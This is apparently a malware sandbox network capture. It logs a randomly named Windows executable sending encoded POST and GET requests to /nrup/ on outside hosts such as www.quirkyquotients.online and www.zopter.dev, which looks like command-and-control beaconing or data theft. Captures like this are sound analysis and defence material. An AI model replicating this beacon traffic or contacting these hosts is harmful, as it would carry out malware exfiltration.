May 3, 2024 11:33:12.719033003 CEST	1173	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 09:33:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 976 Connection: close X-Served-By: Namecheap URL Forward Server: namecheap-nginx Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49174	66.96.162.142	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:17.943209887 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.quirkyquotients.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.quirkyquotients.online Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.quirkyquotients.online/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 6d 51 31 49 68 6c 71 30 52 69 38 78 6b 33 75 6a 41 6a 61 53 69 43 51 50 49 37 36 2f 42 42 77 47 66 56 61 6c 76 6a 57 45 38 73 68 36 70 71 63 32 39 38 79 61 6a 33 74 61 53 51 4f 4a 49 4a 30 4d 36 7a 62 42 37 77 55 76 50 79 75 74 50 49 48 37 64 77 4a 42 42 65 37 64 47 33 47 58 73 55 71 75 30 41 37 32 42 4e 42 72 76 39 39 48 2b 45 4a 46 61 57 57 75 34 53 4c 43 6e 6c 34 71 70 71 4b 35 64 55 4c 2f 30 77 45 75 57 55 56 43 4b 4a 55 6f 37 33 6b 65 36 4f 31 72 48 75 59 2b 55 69 69 6a 5a 53 62 63 55 65 4d 48 4a 74 58 7a 63 7a 6f 56 55 79 5a 71 69 2f 67 71 48 4a 34 4e 58 4c 66 72 76 2f 4e 46 63 38 31 6a 45 42 30 32 58 5a 51 4f 64 6b 56 6a 65 75 4b 68 54 45 34 66 42 62 6f 79 2f 56 4f 50 70 48 50 7a 4a 35 50 58 44 59 48 6b 42 57 4c 6c 47 2f 37 4b 32 33 53 53 35 79 53 75 6d 71 64 42 41 4e 2f 66 63 4e 2b 31 48 5a 73 51 55 7a 6c 6b 4e 34 67 6e 43 4d 53 51 37 36 38 6c 4e 6c 70 4f 4f 2b 45 4f 6e 49 56 66 79 49 35 45 39 70 43 53 41 70 39 4c 35 30 6a 6b 4e 2b 52 4e 53 36 6c 6b 59 42 64 49 46 6b 78 62 [TRUNCATED] Data Ascii: pX6dR=mQ1Ihlq0Ri8xk3ujAjaSiCQPI76/BBwGfValvjWE8sh6pqc298yaj3taSQOJIJ0M6zbB7wUvPyutPIH7dwJBBe7dG3GXsUqu0A72BNBrv99H+EJFaWWu4SLCnl4qpqK5dUL/0wEuWUVCKJUo73ke6O1rHuY+UiijZSbcUeMHJtXzczoVUyZqi/gqHJ4NXLfrv/NFc81jEB02XZQOdkVjeuKhTE4fBboy/VOPpHPzJ5PXDYHkBWLlG/7K23SS5ySumqdBAN/fcN+1HZsQUzlkN4gnCMSQ768lNlpOO+EOnIVfyI5E9pCSAp9L50jkN+RNS6lkYBdIFkxb4FZ9hnGYv6bM2TxOZwQ4e8gPW9y8A/Jbsn5xI5d7QsTNrRVmCk7lC6yuj/+y4jGt3hMOlaFqLqaB1LGPU1o13L7VgI0pr5omodp8zLP7h9ah399u0sS/dl6BiF6ZT9MowNihBNQEHIjuKJqqCNLTqFooHhfZKjk/gQqCnm68PMW1ZPWT6Raw7vsmUp5rIt6TDdKS6fmzPzicqMjCAitBUFk61FlsGTf71DgBTvhxUzP1uYaQW8oHJJz1UPHJAheYKbaeZLZIYkhL1qQzpy0hNEoyn6B382fAxcSoWzRcxo+TDdlSIjHLqLMdLvNnQHsZmZBKxZWRIAtYmunwIQnu+DwWBMsq+hKli8ouEmux+v7+oHYRsi9P8a/ZlUJbHQtkdQivRF5eJ5pmK+8yFVdPOji9wJ0gBG3xCDha4z6jdTk1ebXgYiWWI7XI24Z8MoDJbPipmqipS+nvqqniPdhGG6qnOBlmaGd+PVFSdbQb0ygDMGKbBqTNWlVg8KfQEXl7vQ5YqCT72a9cYyt3iNjtWVVCdVoZQr9xFuPJ57zhl5VnV/Bh4nMmFCcgNok0AIrl1ZhJmslBHSKS9ytYc8gxCNps8MFS7DewYuDjcKcB5s80SZyqTMiMoQJbLepf3wlWU6v5/XxbvzhiiNdmmin7hjeOlWDp5fbbnz [TRUNCATED]
May 3, 2024 11:33:18.036215067 CEST	146	OUT	Data Raw: 71 64 31 6d 62 69 34 61 62 45 4e 47 73 55 70 4d 42 64 37 52 69 69 43 35 6f 35 4a 52 36 4c 4c 4b 72 64 66 31 31 56 68 4e 45 67 31 46 74 50 30 78 53 47 74 4b 61 46 76 45 43 2f 32 72 68 4e 74 69 65 56 48 34 47 41 32 48 4d 70 57 4c 44 6e 77 7a 4c 6f Data Ascii: qd1mbi4abENGsUpMBd7RiiC5o5JR6LLKrdf11VhNEg1FtP0xSGtKaFvEC/2rhNtieVH4GA2HMpWLDnwzLotktK9pZZnipajyuCHtxB+blG5XrKhRYjbO+wLl4cVMrq2F89BZhPygdZWHkaAaoI
May 3, 2024 11:33:18.148755074 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:18 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49175	66.96.162.142	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:20.566188097 CEST	763	OUT	POST /nrup/ HTTP/1.1 Host: www.quirkyquotients.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.quirkyquotients.online Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.quirkyquotients.online/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 6d 51 31 49 68 6c 71 30 52 69 38 78 6b 77 43 6a 42 79 61 53 7a 53 51 50 45 62 36 2f 62 78 77 45 66 56 65 74 76 69 54 63 39 61 46 36 70 2b 59 32 39 4f 61 61 6b 33 74 56 5a 77 50 41 4c 35 30 5a 36 7a 61 71 37 77 59 76 50 79 4b 74 50 71 50 37 55 56 39 65 63 65 37 62 4f 58 47 53 73 55 6d 64 30 41 32 7a 42 4e 70 72 76 38 78 48 78 6b 5a 46 52 51 43 75 6f 79 4c 45 6a 56 34 39 70 71 4f 73 64 51 76 6e 30 77 51 75 44 78 31 43 50 4d 59 6f 73 57 6b 65 73 2b 31 75 4e 4f 5a 64 63 53 50 36 42 52 6a 76 5a 59 59 32 45 2b 32 53 51 6a 73 58 5a 42 74 67 30 2f 51 77 4f 5a 52 74 44 61 61 48 77 77 3d 3d Data Ascii: pX6dR=mQ1Ihlq0Ri8xkwCjByaSzSQPEb6/bxwEfVetviTc9aF6p+Y29Oaak3tVZwPAL50Z6zaq7wYvPyKtPqP7UV9ece7bOXGSsUmd0A2zBNprv8xHxkZFRQCuoyLEjV49pqOsdQvn0wQuDx1CPMYosWkes+1uNOZdcSP6BRjvZYY2E+2SQjsXZBtg0/QwOZRtDaaHww==
May 3, 2024 11:33:20.674849033 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:20 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49176	66.96.162.142	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:27.818240881 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.quirkyquotients.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.quirkyquotients.online Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.quirkyquotients.online/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 6d 51 31 49 68 6c 71 30 52 69 38 78 32 67 53 6a 4d 78 79 53 6a 43 51 4d 42 62 36 2f 42 42 77 59 66 56 61 74 76 6a 57 45 38 6f 4a 36 70 76 49 32 39 73 79 61 69 33 74 56 62 77 4f 4a 49 4a 30 44 36 79 36 4d 37 77 4a 53 50 77 6d 74 50 4a 48 37 64 7a 52 42 49 2b 37 64 4b 58 47 56 73 55 6d 79 30 41 6d 2f 42 4e 74 42 76 34 6c 48 78 58 78 46 61 41 43 68 74 79 4c 45 6a 56 34 78 70 71 4f 45 64 55 44 76 30 31 38 2b 57 53 64 43 4b 5a 55 6f 71 33 6b 5a 6c 65 31 71 44 75 59 77 55 69 75 6f 5a 53 62 59 55 61 63 68 4a 74 4c 7a 64 68 77 56 55 78 68 70 2b 66 67 70 4a 70 34 4e 4a 37 66 70 76 2f 4d 55 63 38 31 6a 45 42 49 32 58 4a 51 4f 64 67 42 67 42 2b 4b 68 62 6b 34 65 4f 37 73 41 2f 56 62 73 70 48 2b 4d 4a 4b 6a 58 52 4c 76 6b 4d 47 4c 6c 41 50 37 4d 32 33 53 66 33 53 53 49 6d 73 31 6a 41 4e 75 61 63 4e 2b 31 48 66 34 51 65 46 78 6b 4f 6f 67 6e 4f 73 53 64 68 4b 38 6d 4e 6c 73 62 4f 2b 67 4f 6e 4d 64 66 7a 2f 56 45 73 62 71 52 55 70 39 49 75 6b 6a 69 41 65 52 55 53 37 4a 65 59 41 6c 69 46 68 68 62 [TRUNCATED] Data Ascii: pX6dR=mQ1Ihlq0Ri8x2gSjMxySjCQMBb6/BBwYfVatvjWE8oJ6pvI29syai3tVbwOJIJ0D6y6M7wJSPwmtPJH7dzRBI+7dKXGVsUmy0Am/BNtBv4lHxXxFaAChtyLEjV4xpqOEdUDv018+WSdCKZUoq3kZle1qDuYwUiuoZSbYUachJtLzdhwVUxhp+fgpJp4NJ7fpv/MUc81jEBI2XJQOdgBgB+Khbk4eO7sA/VbspH+MJKjXRLvkMGLlAP7M23Sf3SSIms1jANuacN+1Hf4QeFxkOognOsSdhK8mNlsbO+gOnMdfz/VEsbqRUp9IukjiAeRUS7JeYAliFhhb4AF9nGGYvKbDiDxKUQsCe9ZoW9GsA4db2TNxP/J0f8TX9BVSI07DC7iAj+ey4Rmt0iEO39xlNaaGn7HJdVoh3LvNgM45+YYmu9p8wo34itbl9d94t8STdl7yiFavTJkowNShQ/IEHIjtPJqWMtWAqF0sHhCeKkc/jAaCniW8FMW1BfXazxbP7vocUrpdLd+TD+iSqpKzEziesMjHYCt2UEI61ExGGSr72igBQNFxYTPxwoafW8olJJn5UP28AiqYKeieN6ZIUEhK4KQ3ty1XNEwcn69J83XAy9yoanFcrI+rBdlSGzGIqL0nLq9dQGkZnr5Kw5WOPAtbgunzMQnG+CcWBMgq+hylhNouVBCx8f74lnYPjC5v8bSmlQwQHTpkPVWvG2RfVZotbO8kBVdnOji5wIswBzDxBX1a9RSkczkyLrX7ACWQI7mn26FWMfbJbPSpnc+pSOnvqqn9PdhdG6nWOEhcaGd+OBpSdp4btCgCDmLJFqSOWkhS8KH2EXZ71iBYqCT04K9TVSt0iNuPWVUjdVUZTbVxF7DJ5evhoJVnU/BgxHMlFCdnNtUkAJrl0pBJhuNGaSKT0StKWctvCNt08MhS7xKwZ7vjc6cB6M83a5y/N8muoQV1Lf5P3B1WVND5z1ZYyjhv/ddkmib2hjXDlW6e5YPbnT [TRUNCATED]
May 3, 2024 11:33:27.911288023 CEST	1610	OUT	Data Raw: 71 71 31 6d 65 50 34 62 33 51 4e 48 38 2b 70 35 35 64 35 68 69 69 49 61 51 36 44 78 36 4e 4f 36 72 61 66 31 31 39 68 4f 6b 6b 31 46 42 66 30 77 61 47 74 4f 69 46 39 45 43 34 68 4c 68 44 73 69 66 53 48 34 61 70 32 48 45 44 57 4c 54 6e 77 32 62 6f Data Ascii: qq1meP4b3QNH8+p55d5hiiIaQ6Dx6NO6raf119hOkk1FBf0waGtOiF9EC4hLhDsifSH4ap2HEDWLTnw2botAxK+pZZuCpfiyvEKN9C+fg3vi78ilorCuC3TDwCTfv2+mY6BolHyB5FOgYwPO5+g6RFmo63F7YM3WgHkEUQa7gXjD+dQXIKlyna+OGGiktdjxAiowXSNIAGXHSys8pdj1o8YXk+B3pGplvtNKdnShti+l/EgBS56
May 3, 2024 11:33:28.036524057 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:27 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49177	66.96.162.142	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:30.438066959 CEST	481	OUT	GET /nrup/?pX6dR=rSdoiViGYDYLrRKaPz3Wl2E0H4idUSMrBzK7mFXa25NHqewciJOPoSpxRDHHO+kRgCzM5kcGIwbMEKXffgYhKvnBPUmrqnWMxjfJBNBOhOMg9F9SVSa9oh3nojFO&tv=6TdD8B HTTP/1.1 Host: www.quirkyquotients.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:33:30.548059940 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:30 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49178	192.185.225.30	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:35.938687086 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.zopter.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.zopter.dev Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.zopter.dev/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 76 31 76 67 77 79 54 4c 31 4b 77 57 43 62 78 55 4e 30 6b 79 2b 59 63 62 69 48 66 2f 41 37 75 4a 79 70 62 44 5a 53 44 31 45 6a 49 4f 69 7a 67 44 51 52 63 62 4a 4d 7a 70 63 64 64 57 57 48 58 54 2f 42 6f 66 7a 75 65 6b 50 74 6d 4c 50 41 4a 50 6c 79 4e 41 6c 71 70 54 32 54 55 41 42 4e 54 39 59 53 44 65 62 4c 30 2f 72 42 67 4a 63 47 53 36 35 74 34 6b 34 68 79 53 64 52 6d 2f 47 6d 61 65 4d 70 75 61 42 52 6b 78 56 33 64 76 69 49 75 67 71 77 73 53 71 72 75 47 50 71 74 37 5a 6f 52 47 37 55 79 6b 2b 2b 4f 39 79 4e 61 63 76 61 77 53 45 42 56 4e 4f 6a 4a 2b 43 72 58 39 59 4e 42 58 6f 49 49 64 31 68 42 64 4d 38 72 42 75 47 33 34 2b 68 57 45 46 59 69 4c 5a 41 6d 4e 62 34 50 52 50 42 58 2b 49 6b 79 69 68 47 73 77 63 65 73 4d 4c 4d 37 4d 32 32 4b 2f 54 69 38 6f 34 45 44 2f 43 66 6a 79 73 4c 57 70 50 63 51 64 5a 79 6b 36 52 38 43 37 34 41 74 69 74 49 4a 6e 47 55 69 72 4d 30 47 77 6b 77 73 62 63 6d 65 33 71 6b 2f 43 63 52 7a 35 43 62 4c 2b 51 61 4b 54 2f 66 41 30 6b 65 67 61 6c 75 51 4d 79 73 4b 65 [TRUNCATED] Data Ascii: 